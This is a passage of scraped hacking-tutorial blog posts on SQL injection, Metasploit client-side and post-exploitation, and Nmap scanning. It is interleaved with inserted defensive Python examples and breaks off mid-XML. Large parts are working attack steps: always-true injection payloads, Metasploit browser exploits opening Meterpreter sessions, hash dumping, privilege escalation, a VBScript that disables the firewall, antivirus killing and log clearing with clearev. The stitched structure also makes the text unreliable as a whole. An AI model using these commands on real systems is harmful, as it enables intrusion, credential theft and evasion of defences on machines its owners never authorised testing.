The database reported an error, converting the result of @@version to an integer and displaying its contents. This technique abuses the type conversion functionality in SQL Server. We sent 0/@@version as part of our injected code. As a division operation needs to be executed between two numbers, the database tries to convert the result from the @@version function into a number. When the operation fails the database displays the content of the variable.<br />
You can use this technique to display any variable in the database. The following example uses this technique to display the user variable:<br />
<br />
<br />
<br />
MySQL Errors<br />
A common configuration is formed by an Apache Web server running PHP on a Linux operating system, but you can find it in many other scenarios as well. The following error is usually an indication of a MySQL injection vulnerability:<br />
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/victim.com/showproduct.php on line 8<br />
<br />
In this example, the attacker injected a single quote in a GET parameter and the PHP page sent the SQL statement to the database. The following fragment of PHP code shows the vulnerability:<br />
<?php<br />
//Connect to the database<br />
//(the mysql_* extension used here was removed in PHP 7; shown as in the original)<br />
mysql_connect("[database]", "[user]", "[password]") or<br />
//Error checking in case the database is not accessible<br />
die("Could not connect: " . mysql_error());<br />
//Select the database<br />
mysql_select_db("[database_name]");<br />
<br />
<br />
When an application running the preceding code catches database errors and the SQL query fails, the returned HTML document will include the error returned by the database. If an attacker modifies a string parameter by adding a single quote the server will return<br />
output similar to the following:<br />
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1<br />
<br />
The preceding output provides information regarding why the SQL query failed. If the<br />
injectable parameter is not a string and therefore is not enclosed between single quotes, the<br />
resultant output would be similar to this:<br />
Error: Unknown column 'attacker' in 'where clause'<br />
<br />
<br />
**********************<br />
Learn more on => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-contd.html" target="_blank">SQL injection Contd......</a><br />
************************************************<br />
<br />
Oracle Errors<br />
<br />
When tampering with the parameters of Java applications with an Oracle back-end<br />
database you will often find the following error:<br />
java.sql.SQLException: ORA-00933: SQL command not properly ended at<br />
oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:180) at<br />
oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)<br />
The preceding error is very generic and means that you tried to execute a syntactically<br />
incorrect SQL statement. Depending on the code running on the server you can find the<br />
following error when injecting a single quote:<br />
Error: SQLException java.sql.SQLException: ORA-01756: quoted string not<br />
properly terminated<br />
In this error the Oracle database detects that a quoted string in the SQL statement is not<br />
properly terminated, as Oracle requires that a string be terminated with a single quote. The<br />
following error re-creates the same scenario in .NET environments:<br />
Exception Details: System.Data.OleDb.OleDbException: One or more errors<br />
occurred during processing of command.<br />
ORA-00933: SQL command not properly ended<br />
The following example shows an error returned from a .NET application<br />
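As an added example (not code from this post or from the book it quotes), the following defender-side check scans HTTP response bodies for the three families of database error shown above (Microsoft SQL Server, MySQL, and Oracle/JDBC) so that a team can confirm its applications return a generic error page rather than a raw database error. The response bodies in the block are constructed samples built from the messages quoted in this post; the signature list and the function names are my own.

```python
"""Detect leaked database error messages in HTTP response bodies.

Added example, not code from the original post. Signatures are built from
the Microsoft SQL Server, MySQL and Oracle error texts quoted in the post;
the sample responses below are constructed for the demonstration.
"""
import re

# (dbms family, compiled pattern): matched anywhere in the body, case-insensitive
SIGNATURES = [
    ("mssql", re.compile(r"Unclosed quotation mark before the character string", re.I)),
    ("mssql", re.compile(r"Syntax error converting the \w+ value", re.I)),
    ("mssql", re.compile(r"Invalid column name '[^']*'", re.I)),
    ("mssql", re.compile(r"System\.Data\.SqlClient\.SqlException", re.I)),
    ("mysql", re.compile(r"You have an error in your SQL syntax", re.I)),
    ("mysql", re.compile(r"mysql_fetch_(?:array|assoc)\(\): supplied argument is not a valid MySQL result resource", re.I)),
    ("mysql", re.compile(r"Unknown column '[^']*' in 'where clause'", re.I)),
    ("oracle", re.compile(r"\bORA-\d{5}\b")),
    ("oracle", re.compile(r"java\.sql\.SQLException", re.I)),
]


def classify_response(body: str) -> list:
    """Return the distinct DBMS families whose error text appears in the body.

    An empty list means no known database error leaked into the response.
    """
    found = []
    for dbms, pattern in SIGNATURES:
        if pattern.search(body) and dbms not in found:
            found.append(dbms)
    return found


def audit_responses(responses: dict) -> dict:
    """Map each response label to the DBMS families it leaks (empty = clean)."""
    return {label: classify_response(body) for label, body in responses.items()}


# Constructed sample responses, built from the messages quoted in the post.
SAMPLE_RESPONSES = {
    "aspx_quote": "Server Error in '/' Application.\n"
                  "Unclosed quotation mark before the character string 'attacker;'.",
    "aspx_version": "Syntax error converting the nvarchar value "
                    "'Microsoft SQL Server 2000 ...' to a column of data type int.",
    "php_quote": "Error: You have an error in your SQL syntax; check the manual "
                 "that corresponds to your MySQL server version near ''' at line 1",
    "php_numeric": "Error: Unknown column 'attacker' in 'where clause'",
    "jsp_quote": "java.sql.SQLException: ORA-01756: quoted string not properly terminated",
    "generic_page": "<html><body><h1>Sorry, something went wrong.</h1></body></html>",
}

if __name__ == "__main__":
    for label, leaks in audit_responses(SAMPLE_RESPONSES).items():
        print(f"{label:14} {'LEAK ' + ','.join(leaks) if leaks else 'clean'}")
```

Run it against captured responses from a staging environment (or against application log lines, since frameworks often log the same exception text); any label that comes back non-empty is a place where the generic error page described in the list above is not yet in front of the database.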
<br />
<br />
SQL injection payload => bikes' or '1'='1 (to make the condition always true)<br />
<br />
<br />
In this example, we injected SQL code that created a meaningful correct query. If the application is vulnerable to SQL injection, the preceding query should return every row in the products table. This technique is very useful, as it introduces an always true condition.<br />
' or '1'='1 is inserted inline with the current SQL statement and does not affect the other parts of the request. The complexity of the query doesn't particularly matter, as we can easily create a correct statement.<br />
<br />
Another test to perform in this kind of situation is the injection of an always false statement.<br />
For that we will send a value that generates no results; for example, bikes' AND '1'='2:<br />
SELECT *<br />
FROM products<br />
WHERE category='bikes' AND '1'='2' /* always false -> returns no rows */<br />
The preceding statement should return no results, as the last condition in the WHERE clause can never be met. However, keep in mind that things are not always as simple as shown in these examples, and don't be surprised if you inject an always false condition and the application still returns results.<br />
<br />
Important:<br />
<span style="white-space: pre;"> </span>Parameter manipulation<br />
<span style="white-space: pre;"> </span><br />
<span style="color: red;">Mitigation</span>:<br />
<span style="white-space: pre;"> </span>Output encoding<br />
<span style="white-space: pre;"> </span>Input validation<br />
<span style="white-space: pre;"> </span>Input sanitization<br />
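To make the remediation concrete, here is an added example (my own code, not from this post or from the book it quotes) that puts the dynamic SQL query described in the "SQL injection Contd" notes beside its parameterized form, and runs the always-true and always-false inputs discussed above against both. It assumes an in-memory SQLite database with a constructed `products` table (idproduct, name, category) standing in for the showproducts.php back end; the function names are mine.

```python
"""Dynamic (concatenated) SQL query beside its parameterized form.

Added example; not code from the original post. Uses an in-memory SQLite
database with a constructed `products` table so it runs offline.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a constructed sample products table (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (idproduct INTEGER, name TEXT, category TEXT)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "Road bike", "bikes"), (2, "Sedan", "cars"), (3, "Dinghy", "boats")],
    )
    conn.commit()
    return conn


def show_products_dynamic(conn: sqlite3.Connection, category: str) -> list:
    """Vulnerable: user input is spliced into the statement text, so the
    database cannot tell data from code (the 'dynamic SQL' the notes describe)."""
    sql = "SELECT idproduct, name FROM products WHERE category='" + category + "'"
    return conn.execute(sql).fetchall()


def show_products_parameterized(conn: sqlite3.Connection, category: str) -> list:
    """Hardened: the statement is compiled with a placeholder and the value is
    bound separately, so a quote in the input is just a quote character."""
    sql = "SELECT idproduct, name FROM products WHERE category=?"
    return conn.execute(sql, (category,)).fetchall()


def run_lookup(conn: sqlite3.Connection, lookup, category: str) -> tuple:
    """Return ('rows', count) or ('error', exception name) so the three response
    classes the post describes (results, no results, database error) line up."""
    try:
        return ("rows", len(lookup(conn, category)))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)


def compare_inputs(conn: sqlite3.Connection) -> dict:
    """Run the post's test values through both lookups side by side."""
    inputs = ["bikes", "bikes' or '1'='1", "bikes' AND '1'='2", "attacker'"]
    return {
        value: (
            run_lookup(conn, show_products_dynamic, value),
            run_lookup(conn, show_products_parameterized, value),
        )
        for value in inputs
    }


if __name__ == "__main__":
    for value, (dyn, safe) in compare_inputs(make_db()).items():
        print(f"{value!r:24} dynamic={dyn}  parameterized={safe}")
```

Only the dynamic version changes its behaviour with the quote in the input: the always-true value returns every row, the always-false value returns none, and a lone quote produces the database error that the inference tests above look for. The parameterized version treats all three as literal category names and returns no rows, which is the behaviour a generic error page should sit in front of.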
<br />
**********************<br />
Learn more on => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-contd.html" target="_blank">SQL injection Contd......</a><br />
************************************************</div>
Nessus and POST Exploitation in MetaSPLOIT (Pprasoon, 2015-05-15)<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-size: large;">Nessus Basics </span><br />
<br />
Nessus is a proprietary vulnerability scanner.<br />
It detects:<br />
> vulnerabilities<br />
> misconfigurations<br />
> default credentials on the target system<br />
> it is used in various compliance audits as well<br />
===================<br />
Learn how to use Meterpreter in Metasploit => <a href="http://prasoon-nigam.blogspot.in/2015/05/meterpreter-basics.html" target="_blank">Meterpreter Basics</a><br />
<br />
Metasploit Basics => <a href="http://prasoon-nigam.blogspot.in/2015/05/metasploit-basics.html" target="_blank">Metasploit Basics</a><br />
======================================================<br />
<br />
To open Nessus:<br />
msfconsole -> type load nessus -> nessus_help<br />
<br />
Connect to Nessus from our localhost for starting the scans <br />
syntax<br />
nessus_connect <your username>:<your Password>@localhost:8834 <ok><br />
Example<br />
nessus_connect prasoonnigam:hacker09@localhost:8834 ok<br />
8834 is the default port<br />
<br />
Check the nessus scanning policies<br />
<br />
Syntax<br />
nessus_policy_list<br />
<br />
Four policies of Nessus <br />
1) External network scan -> used for scanning network vulnerabilities externally<br />
2) Internal network scan -> used for scanning network vulnerabilities internally<br />
3) Web App Tests -> used for scanning web applications for vulnerabilities<br />
4) PCI-DSS (Payment Card Industry-data Security Standard) audits -> used in payment card industry as the data security standard <br />
<br />
Scanning victim machine<br />
<br />
> have to create a new scan<br />
syntax<br />
nessus_scan_new <policy ID> <scan name> <target ip><br />
example<br />
nessus_scan_new -2 windowssan 192.168.3.2<br />
> checking the status <br />
nessus_scan_status<br />
> checking for the report list<br />
nessus_report_list<br />
> opening the report <br />
nessus_report_hosts <report ID><br />
example : nessus_report_hosts dgfwef82nd8934y89hg9rety389<br />
>> When you look at the severity column, you get the total number of vulnerabilities at each level.<br />
<br />
Classifications of the different vulnerabilities <br />
<br />
> Sev 0 indicates high level vulnerabilities <br />
> Sev 1 indicates medium level vulnerabilities<br />
> Sev 2 indicates low-level vulnerabilities<br />
> Sev 3 indicates informational vulnerabilities<br />
<br />
Command to see all the vulnerabilities <br />
<br />
nessus_report_hosts_ports <target IP> <report id><br />
example : nessus_report_hosts_ports 192.168.11.164 asjfh398fdbf5t705tdb4t9<br />
<br />
Report Importing in Metasploit<br />
<br />
> Importing an Nmap report via msfconsole into the PostgreSQL database<br />
 Scan any host and save the Nmap report in XML format<br />
<br />
>> Check the database connectivity of msfconsole<br />
 syntax : db_status<br />
<br />
> Import the Nmap report<br />
 syntax: db_import <report path with file name><br />
 example: db_import /root/Desktop/scan.xml<br />
<br />
>> See the host details<br />
 syntax: hosts <ip> (the host on which the Nmap scan was performed)<br />
 Example: hosts 192.168.11.23<br />
You will get to know the OS and MAC address<br />
<br />
>> Check the open ports and the services running on those ports<br />
 syntax: services <ip><br />
 example: services 192.168.0.102<br />
<br />
> Importing the Nessus report into msfconsole<br />
 syntax: db_import <report path with file location><br />
 example: db_import /root/Desktop/Nessus_scan.nessus<br />
<br />
> Check the vulnerabilities<br />
 syntax: vulns <ip (hostname)><br />
 example: vulns 192.168.22.16<br />
<br />
<br />
<span style="font-size: large;">Client Side Exploitation </span><br />
<br />
 What are Client Side Attacks?<br />
<br />
> The server is the main computer that shares its resources over the network, and the clients, which are the other computers on the network, use these resources.<br />
<br />
> There is a large array of attacks that may be launched against the clients, such as:<br />
> browser-based attacks<br />
> vulnerable service exploitation<br />
> client OSes have multiple applications such as PDF readers, document readers and instant messengers<br />
<br />
> The malicious code may exploit any form of ActiveX, Java and Flash in the browser.<br />
<br />
Exploits of the victim browser<br />
<br />
> browser autopwn<br />
 msfconsole -> use auxiliary/server/browserautopwn -> show options -> set LHOST 192.168.2.23 (required field that has to be filled) -> set SRVHOST 192.168.3.22 (SRVHOST is the local host address, i.e. our local machine address) -> set SRVPORT 80 (SRVPORT is the local port) -> run<br />
<br />
After typing in run, it starts the exploit modules on the localhost and also provides the malicious URL, which must be given and clicked.<br />
<br />
 -> To check the Meterpreter session that was created, type in "sessions"<br />
<br />
(getting into the computer and creating a session)<br />
-> sessions (shows the ID) -> sessions -i 1 (the session id) -> sysinfo<br />
<br />
> Internet Explorer Shortcut Icon Exploit<br />
 shortcut icons that contain a malicious DLL<br />
<br />
 msfconsole -> use windows/browser/ms10_046_shortcut_icon_dllloader -> show options -> set SRVHOST 192.168.2.3 -> set SRVPORT 80 -> set URIPATH / -> exploit -> sessions -> sessions -i 1<br />
<br />
> Internet Explorer malicious VBScript code execution exploit<br />
<br />
 msfconsole -> use exploit/windows/browser/ms10_022_ie_vbsscript_winhlp32 -> show options -> set SRVHOST 192.168.11.105 -> set SRVPORT 80 -> set URIPATH / -> exploit -> send the URL<br />
After F1 is pressed, the malicious VBScript runs in the browser and sends a payload named calc.exe -> sessions -> sessions -i 1<br />
<br />
<span style="font-size: x-large;"><br /> POST Exploitation</span><br />
<br />
 Post exploitation basically means the phases of operation once a victim's system has been compromised by the attacker. The value of the compromised system is determined by the value of the actual data stored in it and how an attacker may make use of it for malicious purposes.<br />
 The concept of post exploitation has arisen from this fact only: how you can use the victim's compromised system's information, documenting it, and having an idea of the configuration channels.<br />
<br />
Phases of post exploitation<br />
> Understanding the victim<br />
> Privilege escalation<br />
> Cleaning tracks and staying undetected<br />
> Collecting system information and data<br />
> Setting up backdoors and rootkits<br />
> Pivoting to penetrate internal networks<br />
<br />
Let's start the first phase of post exploitation by gathering as much information as possible.<br />
<br />
Type in:<br />
 sysinfo (get system info)<br />
 getpid (get process ID)<br />
 ps (get process list)<br />
 run checkvm (whether the victim's system is a virtual machine or not)<br />
 idletime (to check whether the victim is active or not)<br />
 run get_env (the victim's system environment, via another Meterpreter script)<br />
 ipconfig (check the victim's system IP address)<br />
 route (to see the full network settings)<br />
 run getcountermeasure (for mapping the security configuration of the victim's system)<br />
 run getgui (enable the victim's Remote Desktop Protocol service)<br />
 run getgui -e<br />
 run gettelnet (enabling the telnet service)<br />
 run gettelnet -e<br />
 run get_local_subnets (see the victim's local subnets)<br />
 run hostedit (allows an attacker to add host entries in the Windows hosts file)<br />
 run hostedit -e 127.0.0.1 www.apple.com<br />
 run enum_logged_on_users (how many users are currently logged in)<br />
 run enum_logged_on_users -c<br />
 run get_application_list (it will show us all the installed applications)<br />
 run windows/gather/forensics/enum_drives (gathering physical drives)<br />
 run windows/gather/enum_ms_product_keys (get the OS product key)<br />
 run windows/gather/credentials/windows_autologin (check the autologin feature)<br />
 run winenum (dump some juicy information such as hashes and tokens)<br />
 cd /root/.msf4/logs/scripts/winenum/Exploit-0FE265D 2013027.2532 -> ls<br />
 cat hashdump.txt<br />
 run scraper<br />
 .msf4/logs/scripts/scraper/192.168.0.104_201330 -> cat services.txt<br />
<br />
<br />
Post Exploitation Privilege Escalation<br />
<br />
> Post exploitation is divided into five phases<br />
<br />
Understanding Privilege Escalation<br />
 Privilege escalation, in simple terms, is gaining elevated privileges to resources that are normally protected and whose access is denied to normal or unauthorized users.<br />
Example: things that can be done after privilege escalation are installing malicious software for unethical uses,<br />
> deleting user files<br />
> denying resources to a particular user<br />
> viewing private information<br />
<br />
Divided into two major forms:<br />
> Vertical Privilege Escalation<br />
> Horizontal Privilege Escalation<br />
<br />
Vertical Privilege Escalation<br />
 A lower-privileged user or application may access functions that are reserved only for authorized or administrative users. This is also known as privilege elevation.<br />
<br />
Horizontal Privilege Escalation<br />
 This escalation usually happens on a horizontal scale with respect to user rights: a normal user accessing the resources reserved for another person.<br />
<br />
Exploiting the victim's system<br />
> we use a piece of software called mini-share (free file sharing software)<br />
<br />
Commands<br />
 open msfconsole -> use ecploit/windows/http/minisgare get overflow -> show options -> set RHOST 192.168.11.203 (victim ip) -> set RPORT 80 -> show targets -> set TARGET 3 (choose the option) -> exploit -><br />
<br />
(Meterpreter) getuid -> getsystem -h -> getsystem -t 0 -> ps<br />
<br />
<br />
Privilege escalation by post exploitation<br />
 The module uses the built-in getsystem command to escalate the current session to the SYSTEM account from an administrator user account.<br />
<br />
(Meterpreter) run post/windows/escalate/getsystem<br />
<br />
 run post/windows/escalate/service_permissions<br />
(The module exploits the existing administrative privileges to obtain a system session. If it fails in the first instance, the module inspects the existing services and looks for insecure file permissions that are vulnerable to an attack.)<br />
<br />
Different exploit for compromising the target system<br />
 msf> exploit/windows/browser/ms10 002 aurora -> show options -> set SRVHOST 192.168.0.109 (Victim IP) -> exploit -> session -> session -i 1<br />
<br />
<br />
Post Exploitation: Cleaning Up Traces<br />
 Cleaning tracks and traces through log deletion, and staying undetected by disabling the firewall and antivirus systems<br />
<br />
Why is a firewall important?<br />
A firewall is basically software or hardware that blocks unauthorized entry to a system or a network. A firewall also keeps track of intrusions and security breaches. If the firewall is well configured, each unauthorized entry is blocked and logged in the security logs. It controls the incoming and outgoing network traffic and analyzes the data packets.<br />
It decides whether it should allow the packet through the firewall or not.<br />
<br />
A firewall is classified into three different types:<br />
> Packet Filter Firewall<br />
> Stateful Firewall<br />
> Application Firewall<br />
<br />
Packet Filter Firewall<br />
 These types of firewall are associated with the first three layers of the OSI model, with a little help from the transport layer as well for the source and destination port numbers. When a packet travels towards the packet filter firewall, it is analyzed against a set of rules.<br />
<br />
Stateful Firewall<br />
 These are also called second-generation firewalls. These firewalls work on the states of a network connection. Based on the state, it determines whether to allow the packet into the network or not.<br />
<br />
Application Firewall<br />
 These are known as third-generation firewalls. Application firewalls work on applications and protocols like HTTP, SMTP and SSH. They also help in detecting whether an unwanted protocol is trying to bypass the firewall on an allowed port.<br />
<br />
commands<br />
 run getcountermeasure<br />
 operational mode = Enable<br />
<br />
 -> shell -> netsh firewall show opmode<br />
see if the firewall is enabled or not<br />
 -> shell -> netsh firewall set opmode mode=disable<br />
<br />
Disabling firewalls through VBScript<br />
<br />
 Code<br />
 Set objFirewall = CreateObject("HNetCfg.FwMgr")<br />
 Set objPolicy = objFirewall.LocalPolicy.CurrentProfile<br />
 objPolicy.FirewallEnabled = FALSE<br />
save the code with a .vbs extension<br />
<br />
syntax: upload <source filepath> <destination filepath><br />
Example: upload root/Desktop/disable.vbs C:\<br />
<br />
 Go to the destination and execute it<br />
<br />
<br />
Antivirus Killing and Log Deletion<br />
<br />
Killing the processes of an antivirus with the help of the post exploitation Meterpreter script known as killav<br />
<br />
Script of killav.rb<br />
 opt/framework/msf3/scripts/killav.rb<br />
<br />
In killav.rb the name of the antivirus must be present; only then will the antivirus be stopped.<br />
<br />
(Meterpreter) run killav -> tasklist (to see the task manager processes) or tasklist /svc or tasklist /svc |find/I "avg"<br />
<br />
> To see the properties of the processes that are running<br />
 sc queryex avgwd -> sc config (process name) start= disabled (disable the process which cannot be killed)<br />
Terminating a process<br />
 taskkill /F /IM "antivirus name*"<br />
<br />
<br />
Clearing tracks to be SAFE<br />
<br />
Clearing all the logs<br />
 (Meterpreter) clearev<br />
</div>
NMAP in METASPLOIT (Pprasoon, 2015-05-02)<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-size: x-large;"> <span style="color: red;">NMAP (Network Mapper)</span></span><span style="color: red;"><br /> using nmap in metasploit </span><br />
> Nmap is a powerful security scanner developed by Gordon Lyon<br />
<br />
<br />
===============<br />
Metasploit => <a href="http://prasoon-nigam.blogspot.in/2015/05/metasploit-basics.html" target="_blank">How to use Metasploit, click on me :)</a><br />
<br />
MeterPreter BASics => <a href="http://prasoon-nigam.blogspot.in/2015/05/meterpreter-basics.html" target="_blank">How to use Meterpreter click one me :)</a><br />
=============================================<br />
<br />
<b><br />NMAP TUTORIALS => <a href="http://prasoon-nigam.blogspot.in/2012/03/nmap-tutorial-backtrack.html" target="_blank">NMAP TUTORIALS Click on me :)</a><br /><br /><br />How does nmap work?</b><br />
> Whenever Nmap performs a scan, it first delivers an ICMP echo request to the destination to check whether the host is alive or dead. This saves Nmap a lot of time when it scans many hosts at once. ICMP requests are sometimes blocked by firewalls, so as a secondary check nmap tries to connect to default open ports such as 80 and 443, which are used by web servers (HTTP/HTTPS).<br />
<br />
Working with NMAP in Metasploit<br />
<br />
Nmap is used for<br />
> hosts<br />
> service<br />
> open ports detection on a computer network<br />
<br />
Nmap has many features <br />
> stealth scan<br />
> aggressive scan<br />
> firewall evasion scan <br />
> has the ability to fingerprint the operating system<br />
>>>>> Nmap has its own Nmap Scripting Engine (NSE) -> its scripts are written in the Lua programming language<br />
<br />
Nmap scanning using Metasploit<br />
Nmap with no options will perform a basic scan on the target address <br />
<br />
syntax<br />
nmap <target_ip_address><br />
nmap 192.168.11.29<br />
<br />
<b>Scan multiple targets </b><br />
syntax <br />
nmap <target target><br />
nmap 192.168.11.46 192.168.11.29<br />
<br />
<b>Scan a list of targets </b><br />
>> the targets in the file just need to be separated by a new line or a space <br />
for example <br />
192.168.11.29<br />
192.168.11.86<br />
192.168.11.36 and so on <br />
<br />
syntax<br />
nmap -iL <list.txt><br />
nmap -iL /root/Desktop/list.txt<br />
<br />
<b>Nmap Options </b><br />
> Nmap command options <br />
Feature Options<br />
> Don't ping -Pn (older spelling -PN)<br />
> Perform a Ping Only Scan -sP<br />
> TCP SYN Ping -PS<br />
> TCP ACK Ping -PA<br />
> UDP Ping -PU<br />
> SCTP INIT Ping -PY<br />
> ICMP Timestamp Ping -PP<br />
> ICMP Echo Ping -PE<br />
> ICMP Address Mask Ping -PM<br />
> IP Protocol Ping -PO<br />
> ARP Ping -PR<br />
> Traceroute --traceroute<br />
> Force Reverse DNS Resolution -R<br />
> Disable Reverse DNS Resolution -n<br />
> Alternative DNS Lookup --system-dns<br />
> Manually Specified DNS Server(s) --dns-servers<br />
> Create a Host List -sL<br />
<br />
Examples<br />
> nmap -sP 192.168.11.60 (Ping only scan)<br />
> nmap -PA 192.168.11.46 (TCP ACK Ping)<br />
> nmap -PE 192.168.11.44 (ICMP echo ping)<br />
> nmap -R 66.147.244.90 (Force reverse DNS resolution)<br />
<br />
<br />
NMAP advanced scanning options<br />
<br />
Features Options<br />
> TCP SYN Scan -sS<br />
> TCP Connect Scan -sT<br />
> UDP scan -sU<br />
> TCP Null Scan -sN<br />
> TCP Fin Scan -sF<br />
> Xmas Scan -sX<br />
> TCP ACK Scan -sA<br />
> Custom TCP Scan --scanflags<br />
> IP Protocol Scan -sO<br />
> Send Raw Ethernet Packets --send-eth<br />
> Send IP Packets --send-ip<br />
<br />
FLAGS Usage<br />
> SYN Synchronize<br />
> ACK Acknowledgement<br />
> PSH Push<br />
> URG Urgent<br />
> RST Reset<br />
> FIN Finished<br />
<br />
<br />
Examples<br />
> nmap -sS 192.168.11.46 (TCP SYN scan) attempts to identify ports by sending a SYN packet to the target & waiting for a response. A SYN packet is basically sent to indicate that a new connection is to be established. This type is also known as the stealth scan.<br />
> nmap -sN 192.168.2.33 (TCP null scan) sends packets without any TCP flags enabled. This is done by setting the flag field of the header to zero, to fool a firewalled system into sending a response.<br />
<br />
Custom TCP Scan <br />
> nmap --scanflags SYNURG 192.168.0.102<br />
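As an added example (not from the original post), the six TCP flags listed above are turned into the flags byte that --scanflags builds, the flag sets behind -sS/-sN/-sF/-sX/-sA are named, and a small detector reports sources in constructed firewall-style records whose probes look like these scans; the record tuple format and the port threshold are assumptions of this example.

```python
"""TCP flag bits behind Nmap's scan types, plus a scan detector (added example, not from the post)."""

# Flag bits in the TCP header's flags byte (RFC 793): the six flags listed in the post.
TCP_FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}

# Flag sets carried by the probes of the scan options discussed above.
SCAN_TYPES = {
    "-sS": {"SYN"},                 # half-open / stealth scan
    "-sN": set(),                   # Null scan: no flags at all
    "-sF": {"FIN"},
    "-sX": {"FIN", "PSH", "URG"},   # Xmas scan
    "-sA": {"ACK"},
}


def scanflags_to_byte(spec):
    """Turn a --scanflags argument such as 'SYNURG' into the flags byte.

    Nmap takes the flag names concatenated in any order, or a decimal number.
    """
    if spec.isdigit():
        value = int(spec)
        if not 0 <= value <= 0xFF:
            raise ValueError("flags value out of range")
        return value
    value, rest = 0, spec.upper()
    while rest:
        for name, bit in TCP_FLAGS.items():
            if rest.startswith(name):
                value |= bit
                rest = rest[len(name):]
                break
        else:
            raise ValueError("unknown flag name at %r" % rest)
    return value


def byte_to_flags(byte):
    """Set of flag names that are set in a flags byte."""
    return {name for name, bit in TCP_FLAGS.items() if byte & bit}


def classify_probe(byte):
    """Nmap option whose probe carries exactly this flag set, or 'custom'."""
    flags = byte_to_flags(byte)
    for option, expected in SCAN_TYPES.items():
        if flags == expected:
            return option
    return "custom"


# Detection side. Records are (src_ip, dst_port, flags_byte) tuples as a firewall
# or packet logger might emit them; this tuple format is an assumption of the example.
SAMPLE_RECORDS = [  # constructed, not captured traffic
    ("10.0.0.5", 22, 0x02),   # normal client: SYN ...
    ("10.0.0.5", 22, 0x10),   # ... followed by ACK, handshake completed
    ("10.0.0.9", 21, 0x02), ("10.0.0.9", 22, 0x02), ("10.0.0.9", 23, 0x02),
    ("10.0.0.9", 25, 0x02), ("10.0.0.9", 80, 0x02), ("10.0.0.9", 443, 0x02),
    ("10.0.0.7", 80, 0x29),   # FIN+PSH+URG: Xmas probe
    ("10.0.0.8", 443, 0x00),  # no flags: Null probe
]


def scan_sources(records, port_threshold=5):
    """Return {src_ip: reason} for sources whose probes look like a port scan.

    Null, FIN and Xmas flag sets never start a real TCP connection, so one such
    packet is enough. SYN-only packets to more than port_threshold distinct ports
    from a source that never sends an ACK are the half-open (-sS) signature.
    """
    syn_ports, acked, stealth = {}, set(), {}
    for src, port, byte in records:
        flags = byte_to_flags(byte)
        kind = classify_probe(byte)
        if kind in ("-sN", "-sF", "-sX"):
            stealth.setdefault(src, kind)
        elif flags == {"SYN"}:
            syn_ports.setdefault(src, set()).add(port)
        elif "ACK" in flags:
            acked.add(src)
    reasons = {src: "%s-style probe, flag set never used by a real connection" % kind
               for src, kind in stealth.items()}
    for src, ports in syn_ports.items():
        if src not in acked and len(ports) > port_threshold:
            reasons.setdefault(src, "half-open SYN probes to %d ports" % len(ports))
    return reasons


if __name__ == "__main__":
    print(hex(scanflags_to_byte("SYNURG")), classify_probe(0x29))
    for src, why in scan_sources(SAMPLE_RECORDS).items():
        print(src, why)
```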
<br />
Port scanning options <br />
Features Options<br />
> Perform a Fast Scan -F<br />
> Scan Specific Ports -p (port)<br />
> Scan Ports by Name -p (name)<br />
> Scan Ports by Protocol -p U:(UDP Ports),T:(TCP Ports)<br />
> Scan All Ports -p "*" (or -p-)<br />
> Scan Top Ports --top-ports<br />
> Perform a Sequential Port Scan -r<br />
<br />
Examples<br />
> nmap -F 192.168.11.46 (Fast scan)<br />
> nmap -p http 192.168.3.8 (scan port by name)<br />
> nmap -r 192.168.3.88 (Performing a Sequential port scan) (useful for evading firewalls and Intrusion Prevention Systems)<br />
<br />
Nmap has some features that help to bypass these protection mechanisms as well <br />
<br />
Feature Options<br />
> Fragments Packets -f<br />
> Specify a Specific MTU --mtu<br />
> Use a Decoy -D<br />
> Idle Zombie Scan -sI<br />
> Manually Specify a Source Port --source-port<br />
> Append Random Data --data-length<br />
> Randomize Target Scan Order --randomize-hosts<br />
> Spoof MAC Address --spoof-mac<br />
> Send Bad Checksums --badsum<br />
<br />
Examples<br />
> nmap -f 192.168.12.88 (fragment packets) Nmap splits its probes into very small 8 byte fragments. Useful for evading an improperly configured firewall system<br />
<br />
> nmap -sI 192.168.3.88 192.168.11.56 (Idle Zombie scan) a very unique scanning technique in which Nmap uses a zombie host for scanning the target. Two IP addresses are given here: the zombie first, then the target <br />
<br />
Spoof MAC Address<br />
This technique is useful when a firewalled system detects a scanning process via the system's MAC address and blacklists that MAC address<br />
MAC addresses can be spoofed via three different arguments <br />
<br />
Arguments -> Function<br />
0 (zero) -> Generates a random MAC address<br />
Specific MAC address -> Uses the specified MAC address<br />
Vendor name -> Generates a MAC address from the specified vendor<br />
(such as Apple, Dell, HP etc)<br />
<br />
syntax<br />
nmap -sT -Pn --spoof-mac Apple 192.168.11.29<br />
<br />
<b>Save Nmap output results </b><br />
Features Options<br />
Save Output to a Text File -oN<br />
Save Output to an XML File -oX<br />
Grepable Output -oG<br />
Output All Supported File Types -oA<br />
Periodically Display Statistics --stats-every<br />
l33t (script kiddie) Output -oS<br />
<br />
syntax<br />
nmap -oX <scan.xml> <target><br />
<br />
example<br />
nmap -oN scan.txt 192.168.11.46<br />
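As an added example (not from the original post), here is a Python parser for the XML report that -oX writes, plus a baseline comparison that reports ports open in a newer scan that were not open before, which is how a defender turns scheduled scans into change alerts; both XML documents are constructed samples in the real nmaprun layout, not scan results from the post.

```python
"""Parse Nmap -oX output and diff two scans (added example, not from the post)."""
import xml.etree.ElementTree as ET

# Constructed sample in the layout Nmap writes with -oX; not a real scan result.
BASELINE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -oX scan.xml 192.168.11.46">
<host><status state="up" reason="syn-ack"/>
<address addr="192.168.11.46" addrtype="ipv4"/>
<hostnames><hostname name="lab-box" type="PTR"/></hostnames>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
<service name="ssh" product="OpenSSH" version="7.4"/></port>
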